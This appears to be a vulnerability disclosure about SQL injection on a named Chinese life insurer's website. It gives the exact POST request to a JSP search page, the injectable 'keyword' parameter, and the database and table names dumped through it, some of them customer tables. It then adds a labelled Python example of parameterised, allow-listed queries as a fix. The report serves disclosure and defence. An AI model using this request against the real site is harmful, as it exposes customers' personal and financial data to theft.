Haikang Life Insurance (海康人寿) main site SQL injection vulnerability
POST /photography/look.jsp HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Referer: http://www.aegon-cnooc.com.cn:80/
Cookie: JSESSIONID=3BE229551343BCD8E7853360EED83F51
Host: www.aegon-cnooc.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

keytype=1&keyword=1
Injectable parameter: keyword
Database: children
[11 tables]
+---------------------------------------+
| aoyun_user                            |
| gold_info_in                          |
| gold_info_out                         |
| inoldperson_user                      |
| money_user                            |
| oldperson_user                        |
| photography_user                      |
| question_answer                       |
| shandong_user                         |
| user                                  |
| user_liuyan                           |
+---------------------------------------+

Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Solution: filter the input.
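
One way to harden the keyword search beyond filtering is to bind keyword as a query parameter and map keytype through an allow-list. This is an added example, not code from the report or from the site. It uses Python's sqlite3 rather than the site's JSP stack so that it runs stand-alone, and the table photo_entry, its columns, the keytype mapping and the sample rows are all hypothetical.

```python
import sqlite3

# Assumption: keytype selects the column to search; this mapping is hypothetical.
SEARCH_COLUMNS = {"1": "title", "2": "author"}


def make_db():
    """Constructed in-memory sample data standing in for the real table."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE photo_entry (id INTEGER PRIMARY KEY, title TEXT, author TEXT)"
    )
    db.executemany(
        "INSERT INTO photo_entry (title, author) VALUES (?, ?)",
        [("Sunrise 100%", "Li"), ("Harbour", "O'Neil"), ("Sunset", "Wang")],
    )
    return db


def escape_like(term, esc="\\"):
    """Escape LIKE wildcards so user text is matched literally."""
    return (
        term.replace(esc, esc + esc)
        .replace("%", esc + "%")
        .replace("_", esc + "_")
    )


def search(db, keytype, keyword, max_len=64):
    # Column names cannot be bound, so keytype goes through an allow-list.
    column = SEARCH_COLUMNS.get(keytype)
    if column is None:
        raise ValueError("unsupported keytype")
    if not isinstance(keyword, str) or not 0 < len(keyword) <= max_len:
        raise ValueError("invalid keyword")
    # keyword is a bound parameter; it never becomes part of the SQL text.
    sql = (
        f"SELECT id, title, author FROM photo_entry "
        f"WHERE {column} LIKE ? ESCAPE '\\' ORDER BY id"
    )
    return db.execute(sql, (f"%{escape_like(keyword)}%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(search(db, "1", "Sun"))     # ordinary search
    print(search(db, "2", "O'Neil"))  # a quote in the input is plain data
```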